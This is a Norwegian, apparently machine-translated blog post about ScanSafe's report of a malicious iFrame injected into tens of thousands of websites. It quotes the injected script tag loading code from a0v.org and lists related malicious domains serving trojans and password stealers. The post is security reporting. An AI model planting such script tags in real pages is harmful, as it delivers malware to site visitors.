ScanSafe slår alarm om tusenvis av kompromitterte websider

ScanSafe er en anerkjent leverandør av Software as a Service (SaaS) websikkerhet. Jeg prøver å ta hensyn til deres STAT-blogg, den inneholder vanligvis verdig informasjon. I dag var intet unntak, slik bloggpostens tittel forutså: Opptil 55K kompromittert av Potent Backdoor / Data Theft Cocktail.

Beryktet iFrame

ScanSafe's Mary Landesman-forfatter av det illevarslende klingende innlegget fant på en eller annen måte en ondsinnet iFrame innebygd i oppover 55 000 nettsteder. Det betydde ikke så mye for meg før jeg fant ut hva en iFrame var. I følge Web Design Group består en iFrame av:

"IFRAME-elementet definerer en inline frame for inkludering av eksterne objekter inkludert andre HTML-dokumenter. IFRAME gir lignende funksjonalitet som OBJECT. En fordel med IFRAME er at det kan fungere som et mål for andre lenker."

Den siste setningen er den du må ta hensyn til. I dette spesielle tilfellet inkluderer iFrame følgende kodestykket:

"script src = http: //a0v.org/x.js"

Hvis jeg forstår riktig, vil den enkle frasen omdirigere nettlesere til http://a0v.org/a.js uten at brukeren vet det.

Hva skjer da

Nettstedet a0v.org er der den tunge programvaren er. Når nettleseren snakker med a0v.org, forklarer Landesman en rekke ondsinnet kode som består av trojanere, bakdører, passordstealere, og muligens vil en nedlaster prøve å installere på den besøkende datamaskinen. Hvis operativsystemet er Windows-basert og sårbart, installeres skadelig programvare.

Ja, dette er nok en gang et eneste Windows-problem. Heldigvis er alle datamaskinene våre oppdaterte og har tilstrekkelig beskyttelse for å forhindre at skadelig programvare slår rot. Ikke sant?

Sjekk det ut

Det jeg synes er fascinerende er at vi kan gjenta Landesmans eksperiment og lett finne hvor mange websider som for øyeblikket er smittet. Skriv inn "script src = http: //a0v.org/x.js" i din favoritt søkemotor og sjekk antall treff.

Da Landesman først skrev innlegget, fant Google-søk 54 900 treff. Jeg får 97.200 treff en dag senere. Noen av nettstedene inkluderer feedzilla.com, latindiscover.com og foodresourcebank.org. Det er kanskje med vilje, men ingen forklarer hvorfor antallet infiserte nettsider vokser så raskt.

A0v.org er ikke den eneste ondsinnede nettdestinasjonen. Andre inkluderer: ahthja.info, gaehh.info, htsrh.info, car741.info, game163.info, car963.info og game158.info. Landesman nevner at ahthja.info er den mest produktive i gruppen. Du kan finne WHOIS-posten for ahthja.info interessant:

Legg merke til den uvanlige registranten og gatenavn. Virker som det er veldig lite vetting som skjer hos akkurat denne registraren.

Fangst 22

Jeg er på ingen måte webutvikler. Likevel ser det ut til at vi kommer til å ha dette problemet til skriptside på klientsiden kan kjøres sikkert. Selvfølgelig, å deaktivere JavaScript eller bruke et program som NoScript løser problemet. Det er helt til du vil se hva som har skjedd på nettstedet.

Siste tanker

Jeg har en ganske god ide om hvorfor så mange datamaskiner er sårbare. Men hva skjer med webservere? Er den nåværende webserverutnyttelsen så ny, bare de skurkene vet om dem? Det virker sikkert som det.

© Copyright 2020 | mobilegn.com